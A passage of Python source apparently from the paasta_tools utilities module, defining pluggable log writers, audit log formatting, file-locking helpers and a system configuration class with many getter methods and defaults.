def register_log_writer(name: str) -> Callable[[_LogWriterTypeT], _LogWriterTypeT]:
"""Returns a decorator that registers that log writer class at a given name
so get_log_writer_class can find it."""
def outer(log_writer_class: _LogWriterTypeT) -> _LogWriterTypeT:
_log_writer_classes[name] = log_writer_class
return log_writer_class
return outer
def get_log_writer_class(name: str) -> Type[LogWriter]:
return _log_writer_classes[name]
def list_log_writers() -> Iterable[str]:
return _log_writer_classes.keys()
def configure_log() -> None:
"""We will log to the yocalhost binded scribe."""
log_writer_config = load_system_paasta_config().get_log_writer()
global _log_writer
LogWriterClass = get_log_writer_class(log_writer_config["driver"])
_log_writer = LogWriterClass(**log_writer_config.get("options", {}))
def _log(
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
return _log_writer.log(
service=service,
line=line,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_audit(
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
if _log_writer is None:
configure_log()
user = get_username()
host = get_hostname()
return _log_writer.log_audit(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
def _now() -> str:
return datetime.datetime.utcnow().isoformat()
def remove_ansi_escape_sequences(line: str) -> str:
"""Removes ansi escape sequences from the given line."""
return no_escape.sub("", line)
def format_log_line(
level: str,
cluster: str,
service: str,
instance: str,
component: str,
line: str,
timestamp: str = None,
) -> str:
"""Accepts a string 'line'.
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains 'line'.
"""
validate_log_component(component)
if not timestamp:
timestamp = _now()
line = remove_ansi_escape_sequences(line.strip())
message = json.dumps(
{
"timestamp": timestamp,
"level": level,
"cluster": cluster,
"service": service,
"instance": instance,
"component": component,
"message": line,
},
sort_keys=True,
)
return message
def format_audit_log_line(
cluster: str,
instance: str,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
timestamp: str = None,
) -> str:
"""Accepts:
* a string 'user' describing the user that initiated the action
* a string 'host' describing the server where the user initiated the action
* a string 'action' describing an action performed by paasta_tools
* a dict 'action_details' optional information about the action
Returns an appropriately-formatted dictionary which can be serialized to
JSON for logging and which contains details about an action performed on
a service/instance.
"""
if not timestamp:
timestamp = _now()
if not action_details:
action_details = {}
message = json.dumps(
{
"timestamp": timestamp,
"cluster": cluster,
"service": service,
"instance": instance,
"user": user,
"host": host,
"action": action,
"action_details": action_details,
},
sort_keys=True,
)
return message
def get_log_name_for_service(service: str, prefix: str = None) -> str:
if prefix:
return f"stream_paasta_{prefix}_{service}"
return "stream_paasta_%s" % service
try:
import clog
# Somehow clog turns on DeprecationWarnings, so we need to disable them
# again after importing it.
warnings.filterwarnings("ignore", category=DeprecationWarning)
class CLogWriter(LogWriter):
def __init__(self, **kwargs: Any):
clog.config.configure(**kwargs)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
"""This expects someone (currently the paasta cli main()) to have already
configured the log object. We'll just write things to it.
"""
if level == "event":
print(f"[service {service}] {line}", file=sys.stdout)
elif level == "debug":
print(f"[service {service}] {line}", file=sys.stderr)
else:
raise NoSuchLogLevel
log_name = get_log_name_for_service(service)
formatted_line = format_log_line(
level, cluster, service, instance, component, line
)
clog.log_line(log_name, formatted_line)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
log_name = AUDIT_LOG_STREAM
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
clog.log_line(log_name, formatted_line)
@register_log_writer("monk")
class MonkLogWriter(CLogWriter):
def __init__(
self,
monk_host: str = "169.254.255.254",
monk_port: int = 1473,
monk_disable: bool = False,
**kwargs: Any,
) -> None:
super().__init__(
monk_host=monk_host, monk_port=monk_port, monk_disable=monk_disable,
)
@register_log_writer("scribe")
class ScribeLogWriter(CLogWriter):
def __init__(
self,
scribe_host: str = "169.254.255.254",
scribe_port: int = 1463,
scribe_disable: bool = False,
**kwargs: Any,
) -> None:
super().__init__(
scribe_host=scribe_host,
scribe_port=scribe_port,
scribe_disable=scribe_disable,
)
except ImportError:
warnings.warn("clog is unavailable")
@register_log_writer("null")
class NullLogWriter(LogWriter):
"""A LogWriter class that doesn't do anything. Primarily useful for integration tests where we don't care about
logs."""
def __init__(self, **kwargs: Any) -> None:
pass
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
pass
@contextlib.contextmanager
def _empty_context() -> Iterator[None]:
yield
_AnyIO = Union[io.IOBase, IO]
@register_log_writer("file")
class FileLogWriter(LogWriter):
def __init__(
self,
path_format: str,
mode: str = "a+",
line_delimiter: str = "\n",
flock: bool = False,
) -> None:
self.path_format = path_format
self.mode = mode
self.flock = flock
self.line_delimiter = line_delimiter
def maybe_flock(self, fd: _AnyIO) -> ContextManager:
if self.flock:
# https://github.com/python/typeshed/issues/1548
return flock(fd)
else:
return _empty_context()
def format_path(
self, service: str, component: str, level: str, cluster: str, instance: str
) -> str:
return self.path_format.format(
service=service,
component=component,
level=level,
cluster=cluster,
instance=instance,
)
def _log_message(self, path: str, message: str) -> None:
# We use io.FileIO here because it guarantees that write() is implemented with a single write syscall,
# and on Linux, writes to O_APPEND files with a single write syscall are atomic.
#
# https://docs.python.org/2/library/io.html#io.FileIO
# http://article.gmane.org/gmane.linux.kernel/43445
try:
with io.FileIO(path, mode=self.mode, closefd=True) as f:
with self.maybe_flock(f):
f.write(message.encode("UTF-8"))
except IOError as e:
print(
"Could not log to {}: {}: {} -- would have logged: {}".format(
path, type(e).__name__, str(e), message
),
file=sys.stderr,
)
def log(
self,
service: str,
line: str,
component: str,
level: str = DEFAULT_LOGLEVEL,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(service, component, level, cluster, instance)
to_write = "{}{}".format(
format_log_line(level, cluster, service, instance, component, line),
self.line_delimiter,
)
self._log_message(path, to_write)
def log_audit(
self,
user: str,
host: str,
action: str,
action_details: dict = None,
service: str = None,
cluster: str = ANY_CLUSTER,
instance: str = ANY_INSTANCE,
) -> None:
path = self.format_path(AUDIT_LOG_STREAM, "", "", cluster, instance)
formatted_line = format_audit_log_line(
user=user,
host=host,
action=action,
action_details=action_details,
service=service,
cluster=cluster,
instance=instance,
)
to_write = f"{formatted_line}{self.line_delimiter}"
self._log_message(path, to_write)
@contextlib.contextmanager
def flock(fd: _AnyIO) -> Iterator[None]:
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX)
yield
finally:
fcntl.flock(fd.fileno(), fcntl.LOCK_UN)
@contextlib.contextmanager
def timed_flock(fd: _AnyIO, seconds: int = 1) -> Iterator[None]:
""" Attempt to grab an exclusive flock with a timeout. Uses Timeout, so will
raise a TimeoutError if `seconds` elapses before the flock can be obtained
"""
# We don't want to wrap the user code in the timeout, just the flock grab
flock_context = flock(fd)
with Timeout(seconds=seconds):
flock_context.__enter__()
try:
yield
finally:
flock_context.__exit__(*sys.exc_info())
def _timeout(process: Popen) -> None:
"""Helper function for _run. It terminates the process.
Doesn't raise OSError, if we try to terminate a non-existing
process as there can be a very small window between poll() and kill()
"""
if process.poll() is None:
try:
# sending SIGKILL to the process
process.kill()
except OSError as e:
# No such process error
# The process could have been terminated meanwhile
if e.errno != errno.ESRCH:
raise
class PaastaNotConfiguredError(Exception):
pass
class NoConfigurationForServiceError(Exception):
pass
def get_readable_files_in_glob(glob: str, path: str) -> List[str]:
"""
Returns a sorted list of files that are readable in an input glob by recursively searching a path
"""
globbed_files = []
for root, dirs, files in os.walk(path):
for f in files:
fn = os.path.join(root, f)
if os.path.isfile(fn) and os.access(fn, os.R_OK) and fnmatch(fn, glob):
globbed_files.append(fn)
return sorted(globbed_files)
class ClusterAutoscalingResource(TypedDict):
type: str
id: str
region: str
pool: str
min_capacity: int
max_capacity: int
IdToClusterAutoscalingResourcesDict = Dict[str, ClusterAutoscalingResource]
class ResourcePoolSettings(TypedDict):
target_utilization: float
drain_timeout: int
PoolToResourcePoolSettingsDict = Dict[str, ResourcePoolSettings]
class MarathonConfigDict(TypedDict, total=False):
user: str
password: str
url: List[str]
class LocalRunConfig(TypedDict, total=False):
default_cluster: str
class RemoteRunConfig(TypedDict, total=False):
default_role: str
class SparkRunConfig(TypedDict, total=False):
default_cluster: str
default_pool: str
class PaastaNativeConfig(TypedDict, total=False):
principal: str
secret: str
ExpectedSlaveAttributes = List[Dict[str, Any]]
class KubeKindDict(TypedDict, total=False):
singular: str
plural: str
class KubeCustomResourceDict(TypedDict, total=False):
version: str
file_prefix: str
kube_kind: KubeKindDict
group: str
class KubeStateMetricsCollectorConfigDict(TypedDict, total=False):
unaggregated_metrics: List[str]
summed_metric_to_group_keys: Dict[str, List[str]]
label_metric_to_label_key: Dict[str, List[str]]
label_renames: Dict[str, str]
class SystemPaastaConfigDict(TypedDict, total=False):
api_endpoints: Dict[str, str]
api_profiling_config: Dict
auth_certificate_ttl: str
auto_config_instance_types_enabled: Dict[str, bool]
auto_hostname_unique_size: int
boost_regions: List[str]
cluster_autoscaler_max_decrease: float
cluster_autoscaler_max_increase: float
cluster_autoscaling_draining_enabled: bool
cluster_autoscaling_resources: IdToClusterAutoscalingResourcesDict
cluster_boost_enabled: bool
cluster_fqdn_format: str
clusters: Sequence[str]
cluster: str
dashboard_links: Dict[str, Dict[str, str]]
default_push_groups: List
default_should_run_uwsgi_exporter_sidecar: bool
deploy_blacklist: UnsafeDeployBlacklist
deployd_big_bounce_deadline: float
deployd_log_level: str
deployd_maintenance_polling_frequency: int
deployd_max_service_instance_failures: int
deployd_metrics_provider: str
deployd_number_workers: int
deployd_startup_bounce_deadline: float
deployd_startup_oracle_enabled: bool
deployd_use_zk_queue: bool
deployd_worker_failure_backoff_factor: int
deploy_whitelist: UnsafeDeployWhitelist
disabled_watchers: List
dockercfg_location: str
docker_registry: str
enable_client_cert_auth: bool
enable_nerve_readiness_check: bool
enable_envoy_readiness_check: bool
enforce_disk_quota: bool
envoy_admin_domain_name: str
envoy_admin_endpoint_format: str
envoy_nerve_readiness_check_script: List[str]
envoy_readiness_check_script: List[str]
expected_slave_attributes: ExpectedSlaveAttributes
filter_bogus_mesos_cputime_enabled: bool
fsm_template: str
git_config: Dict
hacheck_sidecar_image_url: str
hacheck_sidecar_volumes: List[DockerVolume]
kubernetes_add_registration_labels: bool
kubernetes_custom_resources: List[KubeCustomResourceDict]
kubernetes_use_hacheck_sidecar: bool
enable_custom_cassandra_status_writer: bool
ldap_host: str
ldap_reader_password: str
ldap_reader_username: str
ldap_search_base: str
ldap_search_ou: str
local_run_config: LocalRunConfig
log_reader: LogReaderConfig
log_writer: LogWriterConfig
maintenance_resource_reservation_enabled: bool
marathon_servers: List[MarathonConfigDict]
mark_for_deployment_max_polling_threads: int
mark_for_deployment_default_polling_interval: float
mark_for_deployment_default_diagnosis_interval: float
mark_for_deployment_default_default_time_before_first_diagnosis: float
mark_for_deployment_should_ping_for_unhealthy_pods: bool
mesos_config: Dict
metrics_provider: str
monitoring_config: Dict
nerve_readiness_check_script: List[str]
paasta_native: PaastaNativeConfig
paasta_status_version: str
pdb_max_unavailable: Union[str, int]
pki_backend: str
pod_defaults: Dict[str, Any]
previous_marathon_servers: List[MarathonConfigDict]
register_k8s_pods: bool
register_marathon_services: bool
register_native_services: bool
remote_run_config: RemoteRunConfig
resource_pool_settings: PoolToResourcePoolSettingsDict
secret_provider: str
security_check_command: str
sensu_host: str
sensu_port: int
service_discovery_providers: Dict[str, Any]
slack: Dict[str, str]
spark_run_config: SparkRunConfig
supported_storage_classes: Sequence[str]
synapse_haproxy_url_format: str
synapse_host: str
synapse_port: int
taskproc: Dict
tron: Dict
uwsgi_exporter_sidecar_image_url: str
vault_cluster_map: Dict
vault_environment: str
volumes: List[DockerVolume]
zookeeper: str
tron_use_k8s: bool
skip_cpu_override_validation: List[str]
def load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Reads Paasta configs in specified directory in lexicographical order and deep merges
the dictionaries (last file wins).
"""
if not os.path.isdir(path):
raise PaastaNotConfiguredError(
"Could not find system paasta configuration directory: %s" % path
)
if not os.access(path, os.R_OK):
raise PaastaNotConfiguredError(
"Could not read from system paasta configuration directory: %s" % path
)
try:
file_stats = frozenset(
{
(fn, os.stat(fn))
for fn in get_readable_files_in_glob(glob="*.json", path=path)
}
)
return parse_system_paasta_config(file_stats, path)
except IOError as e:
raise PaastaNotConfiguredError(
f"Could not load system paasta config file {e.filename}: {e.strerror}"
)
def optionally_load_system_paasta_config(
path: str = PATH_TO_SYSTEM_PAASTA_CONFIG_DIR,
) -> "SystemPaastaConfig":
"""
Tries to load the system paasta config, but will return an empty configuration if not available,
without raising.
"""
try:
return load_system_paasta_config(path=path)
except PaastaNotConfiguredError:
return SystemPaastaConfig({}, "")
@lru_cache()
def parse_system_paasta_config(
file_stats: FrozenSet[Tuple[str, os.stat_result]], path: str
) -> "SystemPaastaConfig":
"""Pass in a dictionary of filename -> os.stat_result, and this returns the merged parsed configs"""
config: SystemPaastaConfigDict = {}
for filename, _ in file_stats:
with open(filename) as f:
config = deep_merge_dictionaries(
json.load(f), config, allow_duplicate_keys=False
)
return SystemPaastaConfig(config, path)
class SystemPaastaConfig:
def __init__(self, config: SystemPaastaConfigDict, directory: str) -> None:
self.directory = directory
self.config_dict = config
def __eq__(self, other: Any) -> bool:
if isinstance(other, SystemPaastaConfig):
return (
self.directory == other.directory
and self.config_dict == other.config_dict
)
return False
def __repr__(self) -> str:
return f"SystemPaastaConfig({self.config_dict!r}, {self.directory!r})"
def get_zk_hosts(self) -> str:
"""Get the zk_hosts defined in this hosts's cluster config file.
Strips off the zk:// prefix, if it exists, for use with Kazoo.
:returns: The zk_hosts specified in the paasta configuration
"""
try:
hosts = self.config_dict["zookeeper"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find zookeeper connection string in configuration directory: %s"
% self.directory
)
# how do python strings not have a method for doing this
if hosts.startswith("zk://"):
return hosts[len("zk://") :]
return hosts
def get_system_docker_registry(self) -> str:
"""Get the docker_registry defined in this host's cluster config file.
:returns: The docker_registry specified in the paasta configuration
"""
try:
return self.config_dict["docker_registry"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find docker registry in configuration directory: %s"
% self.directory
)
def get_hacheck_sidecar_volumes(self) -> List[DockerVolume]:
"""Get the hacheck sidecar volumes defined in this host's hacheck_sidecar_volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
volumes = self.config_dict["hacheck_sidecar_volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find hacheck_sidecar_volumes in configuration directory: %s"
% self.directory
)
return _reorder_docker_volumes(list(volumes))
def get_volumes(self) -> Sequence[DockerVolume]:
"""Get the volumes defined in this host's volumes config file.
:returns: The list of volumes specified in the paasta configuration
"""
try:
return self.config_dict["volumes"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find volumes in configuration directory: %s" % self.directory
)
def get_cluster(self) -> str:
"""Get the cluster defined in this host's cluster config file.
:returns: The name of the cluster defined in the paasta configuration
"""
try:
return self.config_dict["cluster"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find cluster in configuration directory: %s" % self.directory
)
def get_dashboard_links(self) -> Mapping[str, Mapping[str, str]]:
return self.config_dict["dashboard_links"]
def get_auto_hostname_unique_size(self) -> int:
"""
We automatically add a ["hostname", "UNIQUE"] constraint to "small" services running in production clusters.
If there are less than or equal to this number of instances, we consider it small.
We fail safe and return -1 to avoid adding the ['hostname', 'UNIQUE'] constraint if this value is not defined
:returns: The integer size of a small service
"""
return self.config_dict.get("auto_hostname_unique_size", -1)
def get_auto_config_instance_types_enabled(self) -> Dict[str, bool]:
return self.config_dict.get("auto_config_instance_types_enabled", {})
def get_api_endpoints(self) -> Mapping[str, str]:
return self.config_dict["api_endpoints"]
def get_enable_client_cert_auth(self) -> bool:
"""
If enabled present a client certificate from ~/.paasta/pki/<cluster>.crt and ~/.paasta/pki/<cluster>.key
"""
return self.config_dict.get("enable_client_cert_auth", True)
def get_enable_nerve_readiness_check(self) -> bool:
"""
If enabled perform readiness checks on nerve
"""
return self.config_dict.get("enable_nerve_readiness_check", True)
def get_enable_envoy_readiness_check(self) -> bool:
"""
If enabled perform readiness checks on envoy
"""
return self.config_dict.get("enable_envoy_readiness_check", False)
def get_nerve_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"nerve_readiness_check_script", ["/check_smartstack_up.sh"]
)
def get_envoy_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"envoy_readiness_check_script",
["/check_proxy_up.sh", "--enable-envoy", "--envoy-check-mode", "eds-dir"],
)
def get_envoy_nerve_readiness_check_script(self) -> List[str]:
return self.config_dict.get(
"envoy_nerve_readiness_check_script",
["/check_proxy_up.sh", "--enable-smartstack", "--enable-envoy"],
)
def get_enforce_disk_quota(self) -> bool:
"""
If enabled, add `--storage-opt size=SIZE` arg to `docker run` calls,
enforcing the disk quota as a result.
Please note that this should be enabled only for a suported environment
(which at the moment is only `overlay2` driver backed by `XFS`
filesystem mounted with `prjquota` option) otherwise Docker will fail
to start.
"""
return self.config_dict.get("enforce_disk_quota", False)
def get_auth_certificate_ttl(self) -> str:
"""
How long to request for ttl on auth certificates. Note that this maybe limited
by policy in Vault
"""
return self.config_dict.get("auth_certificate_ttl", "11h")
def get_pki_backend(self) -> str:
"""
The Vault pki backend to use for issueing certificates
"""
return self.config_dict.get("pki_backend", "paastaca")
def get_fsm_template(self) -> str:
fsm_path = os.path.dirname(paasta_tools.cli.fsm.__file__)
template_path = os.path.join(fsm_path, "template")
return self.config_dict.get("fsm_template", template_path)
def get_log_writer(self) -> LogWriterConfig:
"""Get the log_writer configuration out of global paasta config
:returns: The log_writer dictionary.
"""
try:
return self.config_dict["log_writer"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_writer in configuration directory: %s"
% self.directory
)
def get_log_reader(self) -> LogReaderConfig:
"""Get the log_reader configuration out of global paasta config
:returns: the log_reader dictionary.
"""
try:
return self.config_dict["log_reader"]
except KeyError:
raise PaastaNotConfiguredError(
"Could not find log_reader in configuration directory: %s"
% self.directory
)
def get_metrics_provider(self) -> Optional[str]:
"""Get the metrics_provider configuration out of global paasta config
:returns: A string identifying the metrics_provider
"""
deployd_metrics_provider = self.config_dict.get("deployd_metrics_provider")
if deployd_metrics_provider is not None:
return deployd_metrics_provider
return self.config_dict.get("metrics_provider")
def get_deployd_worker_failure_backoff_factor(self) -> int:
"""Get the factor for calculating exponential backoff when a deployd worker
fails to bounce a service
:returns: An integer
"""
return self.config_dict.get("deployd_worker_failure_backoff_factor", 30)
def get_deployd_maintenance_polling_frequency(self) -> int:
"""Get the frequency in seconds that the deployd maintenance watcher should
poll mesos's api for new draining hosts
:returns: An integer
"""
return self.config_dict.get("deployd_maintenance_polling_frequency", 30)
def get_deployd_startup_oracle_enabled(self) -> bool:
"""This controls whether deployd will add all services that need a bounce on
startup. Generally this is desirable behavior. If you are performing a bounce
of *all* services you will want to disable this.
:returns: A boolean
"""
return self.config_dict.get("deployd_startup_oracle_enabled", True)
def get_deployd_max_service_instance_failures(self) -> int:
"""Determines how many times a service instance entry in deployd's queue
can fail before it will be removed from the queue.
:returns: An integer
"""
return self.config_dict.get("deployd_max_service_instance_failures", 20)
def get_sensu_host(self) -> str:
"""Get the host that we should send sensu events to.
:returns: the sensu_host string, or localhost if not specified.
"""
return self.config_dict.get("sensu_host", "localhost")
def get_sensu_port(self) -> int:
"""Get the port that we should send sensu events to.
:returns: the sensu_port value as an integer, or 3030 if not specified.
"""
return int(self.config_dict.get("sensu_port", 3030))
def get_dockercfg_location(self) -> str:
"""Get the location of the dockerfile, as a URI.
:returns: the URI specified, or file:///root/.dockercfg if not specified.
"""
return self.config_dict.get("dockercfg_location", DEFAULT_DOCKERCFG_LOCATION)
def get_synapse_port(self) -> int:
"""Get the port that haproxy-synapse exposes its status on. Defaults to 3212.
:returns: the haproxy-synapse status port."""
return int(self.config_dict.get("synapse_port", 3212))
def get_default_synapse_host(self) -> str:
"""Get the default host we should interrogate for haproxy-synapse state.
:returns: A hostname that is running haproxy-synapse."""
return self.config_dict.get("synapse_host", "localhost")
def get_synapse_haproxy_url_format(self) -> str:
"""Get a format string for the URL to query for haproxy-synapse state. This format string gets two keyword
arguments, host and port. Defaults to "http://{host:s}:{port:d}/;csv;norefresh".
:returns: A format string for constructing the URL of haproxy-synapse's status page."""
return self.config_dict.get(
"synapse_haproxy_url_format", DEFAULT_SYNAPSE_HAPROXY_URL_FORMAT
)
def get_service_discovery_providers(self) -> Dict[str, Any]:
return self.config_dict.get("service_discovery_providers", {})
def get_cluster_autoscaling_resources(self) -> IdToClusterAutoscalingResourcesDict:
return self.config_dict.get("cluster_autoscaling_resources", {})
def get_cluster_autoscaling_draining_enabled(self) -> bool:
""" Enable mesos maintenance mode and trigger draining of instances before the
autoscaler terminates the instance.
:returns A bool"""
return self.config_dict.get("cluster_autoscaling_draining_enabled", True)
def get_cluster_autoscaler_max_increase(self) -> float:
""" Set the maximum increase that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_increase", 0.2)
def get_cluster_autoscaler_max_decrease(self) -> float:
""" Set the maximum decrease that the cluster autoscaler can make in each run
:returns A float"""
return self.config_dict.get("cluster_autoscaler_max_decrease", 0.1)
def get_maintenance_resource_reservation_enabled(self) -> bool:
""" Enable un/reserving of resources when we un/drain a host in mesos maintenance
*and* after tasks are killed in setup_marathon_job etc.
:returns A bool"""
return self.config_dict.get("maintenance_resource_reservation_enabled", True)
def get_cluster_boost_enabled(self) -> bool:
""" Enable the cluster boost. Note that the boost only applies to the CPUs.
If the boost is toggled on here but not configured, it will be transparent.
:returns A bool: True means cluster boost is enabled."""
return self.config_dict.get("cluster_boost_enabled", False)
def get_resource_pool_settings(self) -> PoolToResourcePoolSettingsDict:
return self.config_dict.get("resource_pool_settings", {})
def get_cluster_fqdn_format(self) -> str:
"""Get a format string that constructs a DNS name pointing at the paasta masters in a cluster. This format
string gets one parameter: cluster. Defaults to 'paasta-{cluster:s}.yelp'.
:returns: A format string for constructing the FQDN of the masters in a given cluster."""
return self.config_dict.get("cluster_fqdn_format", "paasta-{cluster:s}.yelp")
def get_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("marathon_servers", [])
def get_previous_marathon_servers(self) -> List[MarathonConfigDict]:
return self.config_dict.get("previous_marathon_servers", [])
def get_paasta_status_version(self) -> str:
"""Get paasta status version string (new | old). Defaults to 'old'.
:returns: A string with the version desired version of paasta status."""
return self.config_dict.get("paasta_status_version", "old")
def get_local_run_config(self) -> LocalRunConfig:
"""Get the local-run config
:returns: The local-run job config dictionary"""
return self.config_dict.get("local_run_config", {})
def get_remote_run_config(self) -> RemoteRunConfig:
"""Get the remote-run config
:returns: The remote-run system_paasta_config dictionary"""
return self.config_dict.get("remote_run_config", {})
def get_spark_run_config(self) -> SparkRunConfig:
"""Get the spark-run config
:returns: The spark-run system_paasta_config dictionary"""
return self.config_dict.get("spark_run_config", {})
def get_paasta_native_config(self) -> PaastaNativeConfig:
return self.config_dict.get("paasta_native", {})
def get_mesos_cli_config(self) -> Dict:
"""Get the config for mesos-cli
:returns: The mesos cli config
"""
return self.config_dict.get("mesos_config", {})
def get_monitoring_config(self) -> Dict:
"""Get the monitoring config
:returns: the monitoring config dictionary"""
return self.config_dict.get("monitoring_config", {})
def get_deploy_blacklist(self) -> DeployBlacklist:
"""Get global blacklist. This applies to all services
in the cluster
:returns: The blacklist
"""
return safe_deploy_blacklist(self.config_dict.get("deploy_blacklist", []))
def get_deploy_whitelist(self) -> DeployWhitelist:
"""Get global whitelist. This applies to all services
in the cluster
:returns: The whitelist
"""
return safe_deploy_whitelist(self.config_dict.get("deploy_whitelist"))
def get_expected_slave_attributes(self) -> ExpectedSlaveAttributes:
"""Return a list of dictionaries, representing the expected combinations of attributes in this cluster. Used for
calculating the default routing constraints."""
return self.config_dict.get("expected_slave_attributes")
def get_security_check_command(self) -> Optional[str]:
"""Get the script to be executed during the security-check build step
:return: The name of the file
"""
return self.config_dict.get("security_check_command", None)
def get_deployd_number_workers(self) -> int:
"""Get the number of workers to consume deployment q
:return: integer
"""
return self.config_dict.get("deployd_number_workers", 4)
def get_deployd_big_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances for SystemPaastaConfig
changes.
:return: float
"""
return float(
self.config_dict.get("deployd_big_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_startup_bounce_deadline(self) -> float:
"""Get the amount of time in the future to set the deadline when enqueuing instances on deployd startup.
:return: float
"""
return float(
self.config_dict.get("deployd_startup_bounce_deadline", 7 * 24 * 60 * 60)
)
def get_deployd_log_level(self) -> str:
"""Get the log level for paasta-deployd
:return: string name of python logging level, e.g. INFO, DEBUG etc.
"""
return self.config_dict.get("deployd_log_level", "INFO")
def get_deployd_use_zk_queue(self) -> bool:
return self.config_dict.get("deployd_use_zk_queue", True)
def get_hacheck_sidecar_image_url(self) -> str:
"""Get the docker image URL for the hacheck sidecar container"""
return self.config_dict.get("hacheck_sidecar_image_url")
def get_register_k8s_pods(self) -> bool:
"""Enable registration of k8s services in nerve"""
return self.config_dict.get("register_k8s_pods", False)
def get_kubernetes_add_registration_labels(self) -> bool:
return self.config_dict.get("kubernetes_add_registration_labels", False)
def get_kubernetes_custom_resources(self) -> Sequence[KubeCustomResourceDict]:
"""List of custom resources that should be synced by setup_kubernetes_cr """
return self.config_dict.get("kubernetes_custom_resources", [])
def get_kubernetes_use_hacheck_sidecar(self) -> bool:
return self.config_dict.get("kubernetes_use_hacheck_sidecar", True)
def get_enable_custom_cassandra_status_writer(self) -> bool:
return self.config_dict.get("enable_custom_cassandra_status_writer", False)
def get_register_marathon_services(self) -> bool:
"""Enable registration of marathon services in nerve"""
return self.config_dict.get("register_marathon_services", True)
def get_register_native_services(self) -> bool:
"""Enable registration of native paasta services in nerve"""
return self.config_dict.get("register_native_services", False)
def get_taskproc(self) -> Dict:
return self.config_dict.get("taskproc", {})
def get_disabled_watchers(self) -> List:
return self.config_dict.get("disabled_watchers", [])
def get_vault_environment(self) -> Optional[str]:
""" Get the environment name for the vault cluster
This must match the environment keys in the secret json files
used by all services in this cluster"""
return self.config_dict.get("vault_environment")
def get_vault_cluster_config(self) -> dict:
""" Get a map from paasta_cluster to vault ecosystem. We need
this because not every ecosystem will have its own vault cluster"""
return self.config_dict.get("vault_cluster_map", {})
def get_secret_provider_name(self) -> str:
""" Get the name for the configured secret_provider, used to
decrypt secrets"""
return self.config_dict.get("secret_provider", "paasta_tools.secret_providers")
def get_slack_token(self) -> str:
""" Get a slack token for slack notifications. Returns None if there is
none available """
return self.config_dict.get("slack", {}).get("token", None)
def get_tron_config(self) -> dict:
return self.config_dict.get("tron", {})
def get_clusters(self) -> Sequence[str]:
return self.config_dict.get("clusters", [])
def get_supported_storage_classes(self) -> Sequence[str]:
return self.config_dict.get("supported_storage_classes", [])
def get_envoy_admin_endpoint_format(self) -> str:
""" Get the format string for Envoy's admin interface. """
return self.config_dict.get(
"envoy_admin_endpoint_format", "http://{host:s}:{port:d}/{endpoint:s}"
)
def get_envoy_admin_port(self) -> int:
""" Get the port that Envoy's admin interface is listening on
from /etc/services. """
return socket.getservbyname(
self.config_dict.get("envoy_admin_domain_name", "envoy-admin")
)
def get_pdb_max_unavailable(self) -> Union[str, int]:
return self.config_dict.get("pdb_max_unavailable", 0)
def get_boost_regions(self) -> List[str]:
return self.config_dict.get("boost_regions", [])
def get_pod_defaults(self) -> Dict[str, Any]:
return self.config_dict.get("pod_defaults", {})
def get_ldap_search_base(self) -> str:
return self.config_dict.get("ldap_search_base", None)
def get_ldap_search_ou(self) -> str:
return self.config_dict.get("ldap_search_ou", None)
def get_ldap_host(self) -> str:
return self.config_dict.get("ldap_host", None)
def get_ldap_reader_username(self) -> str:
return self.config_dict.get("ldap_reader_username", None)
def get_ldap_reader_password(self) -> str:
return self.config_dict.get("ldap_reader_password", None)
def get_default_push_groups(self) -> List:
return self.config_dict.get("default_push_groups", None)
def get_git_config(self) -> Dict:
"""Gets git configuration. Includes repo names and their git servers.
:returns: the git config dict
"""
return self.config_dict.get(
"git_config",
{
"git_user": "git",
"repos": {
"yelpsoa-configs": {
"repo_name": "yelpsoa-configs",
"git_server": DEFAULT_SOA_CONFIGS_GIT_URL,
"deploy_server": DEFAULT_SOA_CONFIGS_GIT_URL,
},
},
},
)
def get_git_repo_config(self, repo_name: str) -> Dict:
"""Gets the git configuration for a specific repo.
:returns: the git config dict for a specific repo.
"""
return self.get_git_config().get("repos", {}).get(repo_name, {})
def get_uwsgi_exporter_sidecar_image_url(self) -> str:
"""Get the docker image URL for the uwsgi_exporter sidecar container"""
return self.config_dict.get(
"uwsgi_exporter_sidecar_image_url",
"docker-paasta.yelpcorp.com:443/uwsgi_exporter-k8s-sidecar:v1.0.0-yelp2",
)
def default_should_run_uwsgi_exporter_sidecar(self) -> bool:
